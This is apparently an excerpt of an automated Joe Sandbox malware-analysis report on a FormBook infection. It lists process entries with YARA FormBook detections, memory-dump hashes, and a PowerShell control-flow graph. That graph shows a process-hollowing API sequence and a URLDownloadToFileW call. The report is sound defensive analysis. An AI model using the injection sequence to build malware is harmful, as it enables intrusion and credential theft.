                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2567334619.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2567334619.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Has exited:false

                                                                                                      Target ID:18
                                                                                                      Start time:03:50:04
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe"
                                                                                                      Imagebase:0xfc0000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2573432013.0000000000E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2573432013.0000000000E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Has exited:false

                                                                                                      Target ID:20
                                                                                                      Start time:03:50:17
                                                                                                      Start date:26/11/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff73feb0000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Reset < >
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1329002394.0000000006170000.00000010.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_6170000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction ID: 6e9a81d203edc7160c9e5af9f571a5b06817666eec6cfe8a044cf859e9120a82
                                                                                                        • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1329002394.0000000006170000.00000010.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_6170000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction ID: 6e9a81d203edc7160c9e5af9f571a5b06817666eec6cfe8a044cf859e9120a82
                                                                                                        • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1466202792.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3660000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1eb75f5d4782db9db11b2806273385827bccd6dcecd7ce004fbe66de3728ffd4
                                                                                                        • Instruction ID: 004bf49bdaabcde604413eec6fb73093da179b2363d85fdf9cc4fe00ea6468b3
                                                                                                        • Opcode Fuzzy Hash: 1eb75f5d4782db9db11b2806273385827bccd6dcecd7ce004fbe66de3728ffd4
                                                                                                        • Instruction Fuzzy Hash: 61224975A00209DFDB05CF99D984A9EFBB6FF88350F298159E905AB361CB31ED41CB90
                                                                                                        APIs
                                                                                                        • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 036651C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1466202792.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_3660000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DownloadFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 1407266417-0
                                                                                                        • Opcode ID: 483898c9be466a1d397b5b68c55702ad4da866b555852510e651713fcb929a3e
                                                                                                        • Instruction ID: 7640945bd36e63a892e0e9bf0d86910d69b0b0a93a71c787b91f6d0f50bf081f
                                                                                                        • Opcode Fuzzy Hash: 483898c9be466a1d397b5b68c55702ad4da866b555852510e651713fcb929a3e
                                                                                                        • Instruction Fuzzy Hash: F62115B5D01219AFCB00CF9AD984ADEFBB4FF48310F14812AE918A7310D374AA54CBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1476177633.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7de0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 13cf1f4630eb1970e1c24eafdb6f0fdf77958d2028de578e0d3875df32c5c937
                                                                                                        • Instruction ID: ece50d85677a7955edb7ba71556c4e7c44a958f41dc669fbe1ec5e84d6a7e609
                                                                                                        • Opcode Fuzzy Hash: 13cf1f4630eb1970e1c24eafdb6f0fdf77958d2028de578e0d3875df32c5c937
                                                                                                        • Instruction Fuzzy Hash: 4B81E7B5B00318AFDB14EF98D411B6EB7E6BFC9710F25841AE945AF740DAB2DC018791
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1476177633.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7de0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4caa7933162f50413bc46a8d9e0d87c42427f4193f376b07b8cad81c4b7ef267
                                                                                                        • Instruction ID: 44e6f2f0b27f28760e66bbb1a44a7919bfeea43af880219cfc5740049e517ebd
                                                                                                        • Opcode Fuzzy Hash: 4caa7933162f50413bc46a8d9e0d87c42427f4193f376b07b8cad81c4b7ef267
                                                                                                        • Instruction Fuzzy Hash: 84516CB17013149FD721ABA8981076AFBB9EFC5710F25845BE549EF381CAB1DC41C7A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1465409704.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_34fd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 22bf497578ecbf436a7121adcaf18694417ea5b2ab1e6bd67248f9c6283acb72
                                                                                                        • Instruction ID: 556331bca2da6ad93e41949bd0cbc26408886a4cf581fdd6474a2da847589f85
                                                                                                        • Opcode Fuzzy Hash: 22bf497578ecbf436a7121adcaf18694417ea5b2ab1e6bd67248f9c6283acb72
                                                                                                        • Instruction Fuzzy Hash: 0201407240E3C05FD7128B258D94B52BFB8DF43224F1D81DBD9888F2A7C2699848C772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1465409704.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_34fd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 83415f23058bf18d95919bbc63acba3749cdb1de671d878f14e70d21e9a34650
                                                                                                        • Instruction ID: 74fcdfb3fa5fcf5c33a04a65eb2982f8f3d363d1155c9060ad49b332c2ca5b85
                                                                                                        • Opcode Fuzzy Hash: 83415f23058bf18d95919bbc63acba3749cdb1de671d878f14e70d21e9a34650
                                                                                                        • Instruction Fuzzy Hash: 5B012B31904300AFE710CE15CD80B67FB9CDF42228F0CC56BEE584F24AC6799442C6BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1357108471.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_e70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (r^$(r^$(r^
                                                                                                        • API String ID: 0-3615989438
                                                                                                        • Opcode ID: dd4c50f13882c09f43fb4622985b5e71ca33fa047a552e7befb799b09d494dd2
                                                                                                        • Instruction ID: 33b7e9af9ce2982b091e14cec2726941023d8f80cb1664f48120e9b52b85933a
                                                                                                        • Opcode Fuzzy Hash: dd4c50f13882c09f43fb4622985b5e71ca33fa047a552e7befb799b09d494dd2
                                                                                                        • Instruction Fuzzy Hash: 28415E75A0D3C69FC703CB68989459ABFB0BF4B210B1941DBD185DF2A3C725E806C762
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1361460771.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_73f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 10692b4ef05d0059c993d55bf7e0c73411764d1428f5c693b5b936e27c749774
                                                                                                        • Instruction ID: 9f15c3a9b7fad8877107b25a304ce5dfe6d32d28d2df7ed8749350da0df2406d
                                                                                                        • Opcode Fuzzy Hash: 10692b4ef05d0059c993d55bf7e0c73411764d1428f5c693b5b936e27c749774
                                                                                                        • Instruction Fuzzy Hash: 3B127BB270431ACFFB158B69981076FBBB2AFD6250F1480ABD649CF251DB71C841C7A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1357108471.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_e70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3fa3ebb0c203bb43009d020d62ca63fb8a42c75f21e104391399b80bbd3eeb6b
                                                                                                        • Instruction ID: 4fde3798805d404e73b0425c76a53be697b5d8b5a672b284793a7ed959424853
                                                                                                        • Opcode Fuzzy Hash: 3fa3ebb0c203bb43009d020d62ca63fb8a42c75f21e104391399b80bbd3eeb6b
                                                                                                        • Instruction Fuzzy Hash: A091AE74A00605CFCB16CF59C494AAEFBB1FF48310B248669D919AB365C735EC51CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1361460771.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_73f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e64f4c795b112e75495fb874ca0ff8069bfdbee7c93e064859c7ba185bd0b2c6
                                                                                                        • Instruction ID: 9ef25f91e6a07079195fc472ac6113946a731a912304bc5e6cb26dad5328ec3d
                                                                                                        • Opcode Fuzzy Hash: e64f4c795b112e75495fb874ca0ff8069bfdbee7c93e064859c7ba185bd0b2c6
                                                                                                        • Instruction Fuzzy Hash: A64119F2A00306CFFB258F599940B7A7BB1AF82284F158097EA499F255D735D940C761
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1357108471.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_e70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9d56a1e45b854be8d879acb64558d1d84e9ea9fc43ce518839f886980827a565
                                                                                                        • Instruction ID: 00389e86ee35cc0ea0b4a844d9e1fc9af2843f50734d1b0f8ad68a82a61cebee
                                                                                                        • Opcode Fuzzy Hash: 9d56a1e45b854be8d879acb64558d1d84e9ea9fc43ce518839f886980827a565
                                                                                                        • Instruction Fuzzy Hash: 20413974A006058FCB06CF59C598AAEF7B1FF48314B2185A9D919AB364C732FC91DBA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1357108471.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_e70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dc61e83fdb0d5a355973361f003982cb395c21b39ede93801651009c07731287
                                                                                                        • Instruction ID: a4b1edef477f44d3bd172441082b2175549165dfae87c6f3c6a07ab3b2310f9c
                                                                                                        • Opcode Fuzzy Hash: dc61e83fdb0d5a355973361f003982cb395c21b39ede93801651009c07731287
                                                                                                        • Instruction Fuzzy Hash: 4F212E74A052499FCB01DFA8D4909AAFBF5FF89310B158099E819EB362C331ED41CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1356864919.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_bbd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 443992d05d49801b20c2867c0dda7dd4773981020a4bc795b3a6b8e9914951bc
                                                                                                        • Instruction ID: 34b585fb6551e92c9148ebfe7f3a2397a547776da5a4dba134c0c4b642f08468
                                                                                                        • Opcode Fuzzy Hash: 443992d05d49801b20c2867c0dda7dd4773981020a4bc795b3a6b8e9914951bc
                                                                                                        • Instruction Fuzzy Hash: 6301F2315043009BE710AE21C9C0BB6BBD8EF41320F58C09AED084A282E6BD9841CAB6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1356864919.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_bbd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2ef413c8c3ceb70b79bf422b9212015d2072f4efb0dde6b57c258b4f912a631c
                                                                                                        • Instruction ID: 44753aefc355d3e5c5a01a509668be0c3017aa9565b03592901a44965e5fc6fd
                                                                                                        • Opcode Fuzzy Hash: 2ef413c8c3ceb70b79bf422b9212015d2072f4efb0dde6b57c258b4f912a631c
                                                                                                        • Instruction Fuzzy Hash: 1501717250E3C05FE7168B218D94B62BFB8EF53224F19C0DBD9888F193D2699844C772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1357108471.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_e70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 768cee09e930bb128cbb22ed9801b2edb0f412609a13559a73525f42b6162caf
                                                                                                        • Instruction ID: c2e52436226f4e1305b20523c348ea913a1e5b7d6cfe84b264509c9c261581c2
                                                                                                        • Opcode Fuzzy Hash: 768cee09e930bb128cbb22ed9801b2edb0f412609a13559a73525f42b6162caf
                                                                                                        • Instruction Fuzzy Hash: 4301D634A042449FDB02DFA8D890AEDFBB1FF49324F14C199D554AB251C732EC52CB65
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1361460771.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_73f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: i$i$i$i
                                                                                                        • API String ID: 0-1528663918
                                                                                                        • Opcode ID: 0eaafb731ffdf46594abe563950aee2cd65e48713c1cff0aaa2f145939ed128e
                                                                                                        • Instruction ID: 542e6312a5524b93e0be06278bf746eae778b2f609c8ceb15a252c7eede19e9e
                                                                                                        • Opcode Fuzzy Hash: 0eaafb731ffdf46594abe563950aee2cd65e48713c1cff0aaa2f145939ed128e
                                                                                                        • Instruction Fuzzy Hash: 73F147B1700219CFEB149B69A4007AABBE5AFD5250F1480BBDA0ECB351EB32DD45C791
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2517895792.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_ec0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0e06161c21655654d98cd94c1d74de37fcd5d181ac2160d52ef5476cd95dc669
                                                                                                        • Instruction ID: 55b9eac5ac43d55ea4a862047d0d416dc0346f66910317a70fc0efe5fcd04780
                                                                                                        • Opcode Fuzzy Hash: 0e06161c21655654d98cd94c1d74de37fcd5d181ac2160d52ef5476cd95dc669
                                                                                                        • Instruction Fuzzy Hash: 35F0B235A001099FDB15CB99D990AEEF7B1FF88324F208169E515A72A1C736AD62CB60

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:7.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:62
                                                                                                        Total number of Limit Nodes:5
                                                                                                        execution_graph 11262 4d0917f 11263 4d09169 11262->11263 11264 4d09225 11263->11264 11267 4d0993d 11263->11267 11265 4d0927d 11268 4d09b5a 11267->11268 11269 4d09b91 11267->11269 11268->11269 11270 4d09bac 11268->11270 11294 4d0993d 8 API calls 11268->11294 11295 4d09bc8 11268->11295 11269->11265 11273 4d0a2cc 11270->11273 11319 4d08708 11270->11319 11272 4d0a4ad CreateProcessW 11276 4d0a521 11272->11276 11273->11272 11291 4d0a1c0 11273->11291 11274 4d09cd0 11274->11273 11275 4d08714 Wow64SetThreadContext 11274->11275 11277 4d09d3b 11275->11277 11277->11273 11278 4d09e4e VirtualAllocEx 11277->11278 11277->11291 11279 4d09e9b 11278->11279 11279->11273 11280 4d09ee9 VirtualAllocEx 11279->11280 11281 4d09f3d 11279->11281 11280->11281 11281->11273 11282 4d0872c WriteProcessMemory 11281->11282 11281->11291 11283 4d09f87 11282->11283 11283->11273 11284 4d0a0d1 11283->11284 11283->11291 11292 4d0872c WriteProcessMemory 11283->11292 11284->11273 11285 4d0872c WriteProcessMemory 11284->11285 11286 4d0a0fa 11285->11286 11286->11273 11287 4d08738 Wow64SetThreadContext 11286->11287 11286->11291 11288 4d0a16f 11287->11288 11288->11273 11289 4d0a177 11288->11289 11290 4d0a180 ResumeThread 11289->11290 11289->11291 11290->11291 11291->11265 11292->11283 11294->11268 11297 4d09bfc 11295->11297 11296 4d08708 CreateProcessW 11299 4d09cd0 11296->11299 11297->11296 11303 4d0a2cc 11297->11303 11298 4d0a4ad CreateProcessW 11301 4d0a521 11298->11301 11299->11303 11323 4d08714 11299->11323 11302 4d0a1c0 11302->11268 11303->11298 11303->11302 11304 4d09d3b 11304->11302 11304->11303 11305 4d09e4e VirtualAllocEx 11304->11305 11307 4d09e9b 11305->11307 11306 4d09f3d 11306->11302 11306->11303 11327 4d0872c 11306->11327 11307->11303 11307->11306 11308 4d09ee9 VirtualAllocEx 11307->11308 11308->11306 11310 4d09f87 11310->11302 11310->11303 11311 4d0a0d1 11310->11311 11318 4d0872c WriteProcessMemory 11310->11318 11311->11303 11312 4d0872c WriteProcessMemory 11311->11312 11313 4d0a0fa 11312->11313 11313->11302 11313->11303 11331 4d08738 11313->11331 11316 4d0a177 11316->11302 11317 4d0a180 ResumeThread 11316->11317 11317->11302 11318->11310 11320 4d0a3c8 CreateProcessW 11319->11320 11322 4d0a521 11320->11322 11324 4d0a608 Wow64SetThreadContext 11323->11324 11326 4d0a682 11324->11326 11326->11304 11328 4d0aa98 WriteProcessMemory 11327->11328 11330 4d0ab23 11328->11330 11330->11310 11332 4d0a608 Wow64SetThreadContext 11331->11332 11334 4d0a16f 11332->11334 11334->11303 11334->11316

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 4d09bc8-4d09c79 5 4d0a3b1-4d0a441 0->5 6 4d09c7f-4d09c8f 0->6 13 4d0a443-4d0a446 5->13 14 4d0a449-4d0a450 5->14 9 4d09c91-4d09c96 6->9 10 4d09c98 6->10 12 4d09c9a-4d09c9c 9->12 10->12 15 4d09cb3-4d09cd2 call 4d08708 12->15 16 4d09c9e-4d09cb1 12->16 13->14 17 4d0a452-4d0a458 14->17 18 4d0a45b-4d0a471 14->18 25 4d09cd4-4d09cd9 15->25 26 4d09cdb 15->26 16->15 17->18 19 4d0a473-4d0a479 18->19 20 4d0a47c-4d0a51f CreateProcessW 18->20 19->20 27 4d0a521-4d0a527 20->27 28 4d0a528-4d0a5a0 20->28 29 4d09cdd-4d09cdf 25->29 26->29 27->28 49 4d0a5b2-4d0a5b9 28->49 50 4d0a5a2-4d0a5a8 28->50 30 4d09ce5-4d09cfa 29->30 31 4d0a327-4d0a33a 29->31 36 4d09d00-4d09d24 30->36 37 4d0a322 30->37 42 4d0a341-4d0a357 31->42 36->42 45 4d09d2a-4d09d3d call 4d08714 36->45 37->31 42->5 57 4d0a359-4d0a363 42->57 55 4d09d43-4d09d4a 45->55 56 4d0a2c5-4d0a2c7 45->56 52 4d0a5d0 49->52 53 4d0a5bb-4d0a5ca 49->53 50->49 58 4d0a5d1 52->58 53->52 59 4d09d50-4d09d5a 55->59 60 4d0a2ab-4d0a2be 55->60 64 4d0a365-4d0a36c 57->64 65 4d0a36e-4d0a370 57->65 58->58 59->42 63 4d09d60-4d09d7d 59->63 60->56 63->37 66 4d09d83-4d09d9d call 4d08720 63->66 68 4d0a372-4d0a376 64->68 65->68 75 4d09da3-4d09daa 66->75 76 4d0a2cc 66->76 70 4d0a378 call 4d097c0 68->70 71 4d0a37d-4d0a38a 68->71 70->71 86 4d0a391-4d0a3ae 71->86 87 4d0a38c 71->87 78 4d09db0-4d09db9 75->78 79 4d0a291-4d0a2a4 75->79 82 4d0a2d3 76->82 80 4d09e24-4d09e2a 78->80 81 4d09dbb-4d09dff 78->81 79->60 80->37 84 4d09e30-4d09e40 80->84 92 4d09e01-4d09e07 81->92 93 4d09e08-4d09e14 81->93 89 4d0a2dd 82->89 84->37 96 4d09e46-4d09e99 VirtualAllocEx 84->96 87->86 94 4d0a2e4 89->94 92->93 93->82 95 4d09e1a-4d09e1e 93->95 99 4d0a2eb 94->99 95->80 98 4d0a277-4d0a28a 95->98 102 4d09ea2-4d09ec0 96->102 103 4d09e9b-4d09ea1 96->103 98->79 104 4d0a2f2 99->104 102->89 105 4d09ec6-4d09ecd 102->105 103->102 111 4d0a2f9 104->111 108 4d09ed3-4d09eda 105->108 109 4d09f54-4d09f5b 105->109 108->94 110 4d09ee0-4d09ee7 108->110 109->99 112 4d09f61-4d09f68 109->112 110->109 113 4d09ee9-4d09f3b VirtualAllocEx 110->113 118 4d0a303 111->118 114 4d0a25d-4d0a270 112->114 115 4d09f6e-4d09f89 call 4d0872c 112->115 116 4d09f44-4d09f4e 113->116 117 4d09f3d-4d09f43 113->117 114->98 115->104 124 4d09f8f-4d09f96 115->124 116->109 117->116 123 4d0a30a 118->123 128 4d0a311 123->128 126 4d0a243-4d0a256 124->126 127 4d09f9c-4d09fa5 124->127 126->114 127->37 129 4d09fab-4d09fb1 127->129 132 4d0a31b 128->132 129->37 131 4d09fb7-4d09fc2 129->131 131->37 135 4d09fc8-4d09fce 131->135 132->37 136 4d0a0d1-4d0a0e2 135->136 137 4d09fd4-4d09fd9 135->137 136->37 141 4d0a0e8-4d0a0fc call 4d0872c 136->141 137->37 138 4d09fdf-4d09ff2 137->138 138->37 142 4d09ff8-4d0a00b 138->142 141->123 145 4d0a102-4d0a109 141->145 142->37 149 4d0a011-4d0a026 142->149 147 4d0a20f-4d0a222 145->147 148 4d0a10f-4d0a115 145->148 163 4d0a229-4d0a23c 147->163 148->37 150 4d0a11b-4d0a12c 148->150 149->111 154 4d0a02c-4d0a030 149->154 150->128 156 4d0a132-4d0a136 150->156 157 4d0a036-4d0a03f 154->157 158 4d0a0b7-4d0a0ba 154->158 159 4d0a141-4d0a149 156->159 160 4d0a138-4d0a13b 156->160 157->37 162 4d0a045-4d0a048 157->162 158->37 161 4d0a0c0-4d0a0c3 158->161 159->37 164 4d0a14f-4d0a159 159->164 160->159 161->37 165 4d0a0c9-4d0a0cb 161->165 162->37 166 4d0a04e-4d0a07e 162->166 163->126 164->42 167 4d0a15f-4d0a171 call 4d08738 164->167 165->136 165->137 166->37 175 4d0a084-4d0a09d call 4d0872c 166->175 167->132 174 4d0a177-4d0a17e 167->174 176 4d0a180-4d0a1be ResumeThread 174->176 177 4d0a1db-4d0a1ee 174->177 183 4d0a0a2-4d0a0a4 175->183 179 4d0a1c0-4d0a1c6 176->179 180 4d0a1c7-4d0a1d4 176->180 181 4d0a1f5-4d0a208 177->181 179->180 180->181 182 4d0a1d6 180->182 181->147 182->87 183->118 186 4d0a0aa-4d0a0b1 183->186 186->158 186->163
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04D09E82
                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04D09F24
                                                                                                          • Part of subcall function 04D0872C: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18B52514,00000000,?,?,?,00000000,00000000,?,04D09F87,?,00000000,?), ref: 04D0AB14
                                                                                                        • ResumeThread.KERNELBASE(?), ref: 04D0A1A7
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04D0A50C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.1726661851.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_4d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 4270437565-0
                                                                                                        • Opcode ID: e88576e26af2b4c370ad060426248974a117df1a77002d1ab2ddcb928a33199d
                                                                                                        • Instruction ID: 30a0c20a9b6cc809204616e96d48f09a96da18f55e2a8411264cf48307a51870
                                                                                                        • Opcode Fuzzy Hash: e88576e26af2b4c370ad060426248974a117df1a77002d1ab2ddcb928a33199d
                                                                                                        • Instruction Fuzzy Hash: C9426D70A003199FEB24DFA9C854B9EBBB2BF84300F14C1A9D549AB391DB74AD84CF51
